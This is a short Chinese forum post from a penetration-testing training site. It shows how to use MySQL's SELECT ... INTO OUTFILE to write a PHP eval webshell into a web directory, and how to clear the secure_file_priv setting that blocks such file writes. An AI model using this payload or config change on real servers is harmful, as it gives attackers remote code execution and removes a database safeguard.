请选择 进入手机版 | 继续访问电脑版

女安网-零基础入门网络安全学习-渗透测试零基础入门学习

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 986|回复: 0

关于mysql写入一句话遇到的问题

[复制链接]

114

主题

128

帖子

1017

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
1017
发表于 2018-4-12 22:09:28 | 显示全部楼层 |阅读模式

select <?php eval($_POST[1]);?> into outfile "d://www//1.php"
secure-file-priv特性
secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。
  • ure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
  • 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
  • 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

如何查看secure-file-priv参数的值:
show global variables like '%secure%';mysql> show global variables like '%secure%';
Variable_nameValue
require_secure_transportOFF
secure_authON
secure_file_priv/var/lib/mysql-files/
3 rows in set (0.02 sec)
MYSQL新特性secure_file_priv对读写文件的影响
此开关默认为NULL,即不允许导入导出。
解决问题:
windows下:修改my.ini 在[mysqld]内加入secure_file_priv =
linux下:修改my.cnf 在[mysqld]内加入secure_file_priv =
MYSQL新特性secure_file_priv对读写文件的影响
然后重启mysql,再查询secure_file_priv
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女安网-零基础入门网络安全学习-渗透测试零基础入门学习 ( 津ICP备17008032号-3版权所有:一极(天津)安全技术服务有限公司

GMT+8, 2019-4-25 04:54 , Processed in 1.354770 second(s), 23 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表